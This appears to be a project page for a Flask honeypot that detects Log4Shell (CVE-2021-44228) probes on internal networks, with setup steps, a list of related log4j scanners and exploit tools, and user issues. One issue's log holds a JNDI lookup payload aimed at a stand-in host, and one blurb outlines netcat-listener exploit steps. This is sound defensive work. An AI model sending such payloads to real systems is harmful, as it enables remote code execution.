Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

Overview

log4j-honeypot-flask

Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

This can be installed on a workstation or server, either by running the Python app/app.py script directly (you'll need python3, Flask, and Requests) or as a Docker container.

You will need to set some environment variables (or hard-code them into the script): WEBHOOK_URL=your Teams, Slack or Mattermost webhook URL to receive notifications HONEYPOT_NAME=unique name for this honeypot so you know where the alerts came from HONEYPOT_PORT=8080 or whatever port you want it to listen on

Important Note: This is a LOW-INTERACTION honeypot meant for internal active defense. It is not supposed to be vulnerable or let attackers get into anything.

All it does is watch for suspicious string patterns in the requests (form fields and HTTP headers) and alert you if anything weird comes through by sending a message on Teams or Slack.

Example running via Docker:

docker build -t log4j-honeypot-flask:latest

docker run -d -p 8080:8080 -e WEBHOOK_URL=https://yourwebhookurl -e HONEYPOT_NAME=dmz_log4j_hp log4j-honeypot-flask

Example running via command line:

export WEBHOOK_URL=https://yourwebhookurl

export HONEYPOT_NAME=LittleBobbyJNDI

export HONEYPOT_PORT=8081

python3 app/app.py

You might also like...
Tools for investigating Log4j CVE-2021-44228

Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re

Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Log4j command generator: Generate commands for CVE-2021-44228
Log4j command generator: Generate commands for CVE-2021-44228

Log4j command generator Generate commands for CVE-2021-44228. Description The vulnerability exists due to the Log4j processor's handling of log messag

A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228

1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://

A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks

Log4j dork scanner This is an auto script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks. Installation:

open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability

CVE-2021-44228-log4jVulnScanner-metasploit open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability pre

CVE-2021-44228 log4j 2.x rce漏洞检测工具
CVE-2021-44228 log4j 2.x rce漏洞检测工具

#1 使用说明 CVE-2021-44228 log4j 2.x rce漏洞检测工具,对目标链接发起get请求并利用dnslog探测是否有回显 $ python3 log4j-scan.py -h

PortSwigger Burp Plugin for the Log4j (CVE-2021-44228)

yLog4j This is Y-Sec's @PortSwigger Burp Plugin for the Log4j CVE-2021-44228 vulnerability. The focus of yLog4j is to support mass-scanning of the Log

Scan your logs for CVE-2021-44228 related activity and report the attackers

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs. search for malicious strings decode payloads print results to stdout or file report

Comments
  • Teams Webhooks

    Teams Webhooks

    How much testing did you do with Teams webhooks? I wasn't able to run the honeypot in Docker with the Teams string and even setting the environmental variables and just running the app it doesn't seem to work. My skill level with Docker and Linux in general is novice. If this is the wrong place for this I apologize in advance.

    opened by retreif 4
  • Not posting to teams with webhook

    Not posting to teams with webhook

    Hello, im novice when it comes to python and requests. But straight of the bat its not working with a webhook to post anything to teams. I tried slack as well but to no success - booted up a kali, a ubuntu and another linux machine, its same on all of them (no post being made). So i tried a regular Windows machine with a ps1 json post and it went straight into the teams channel -so the hook works. The "listener" is running and i can see my request coming in on the "server" (app.py, in the terminal - and its formatted as json).

    I cant tell whats wrong, but its not working. 3 different systems, different hooks (slack, teams and webhook.site). Tried adding print('debug x') here and there and everything seems to work - except the post to be made to to teams.

    Maybe its just me.

    Im starting the server with commandlines, but i also tried hardcoded variables in the app.py.

      Running on all addresses.
       WARNING: This is a development server. Do not use it in a production deployment.
      Running on http://x.x.x.x:4444/ (Press CTRL+C to quit)   #<---- here a curl request is made, it comes through:
    ('Host', 'x.x.x.x:4444')
    ('User-Agent', 'curl/7.79.1')
    ('Accept', '*/*')
    ('X-Api-Version', '${jndi:ldap://ooof.muchlog4j}')
    x.x.x.x - - [15/Dec/2021 13:28:37] "GET / HTTP/1.1" 200 -
    
    

    Just wanted to add that a regular python json post works to the same webhook:

    import requests
    import json
    
    url = "xxxxxxxxx"
    
    payload = {
        "text": "Sample alert text"
    }
    headers = {
        'Content-Type': 'application/json'
    }
    response = requests.post(url, headers=headers, data=json.dumps(payload))
    print(response.text.encode('utf8'))
    
    opened by hitem 4
  • Use the full container name

    Use the full container name

    Buildah isn't guaranteed to pull from docker.io. It always recommended to use the full name.

    In this case it seems to work out fine. I have had issues in the past with this however.

    opened by sir-ragna 1
  • Detection String and False Positives

    Detection String and False Positives

    This log4j honeypot is a great idea! However, I have a suggestion. Detecting only on the string ${ might prove to elicit many false positives. While using some of the common YARA strings being published are proving vulnerable to WAF bypasses, and elicit many false negatives. Karan Lyons has published log4shell regexes that appear to mitigate this. https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

    enhancement 
    opened by antman1p 5
Owner
Binary Defense
Binary Defense is a leading information security company that specializes in endpoint detection, response, and protection and a MSSP services.
Binary Defense
Scans for Log4j versions effected by CVE-2021-44228

check_mkExtension to check for log4j2 CVE-2021-44228 This Plugin wraps around logpresso/CVE-2021-44228-Scanner (Apache License 2.0) How it works Run i

inett GmbH 4 Jun 30, 2022
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

log4j An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 Usage $ python3 log4j.py -l urls.txt --dns-log REPLACE_THIS.dnslog.

null 2 Dec 16, 2021
A honeypot for the Log4Shell vulnerability (CVE-2021-44228)

Log4Pot A honeypot for the Log4Shell vulnerability (CVE-2021-44228). License: GPLv3.0 Features Listen on various ports for Log4Shell exploitation. Det

Thomas Patzke 79 Dec 27, 2022
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 130 Dec 15, 2022
Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

Northwave 125 Dec 9, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Víctor García 187 Jan 3, 2023
Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

elyesa 5 Nov 9, 2022
A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

CVE-2021-44228 – Log4j RCE Unauthenticated About This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). This vulnerability

Pedro Havay 20 Nov 11, 2022
Mass Check Vulnerable Log4j CVE-2021-44228

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co

Justakazh 6 Dec 28, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Wade 1 Dec 15, 2021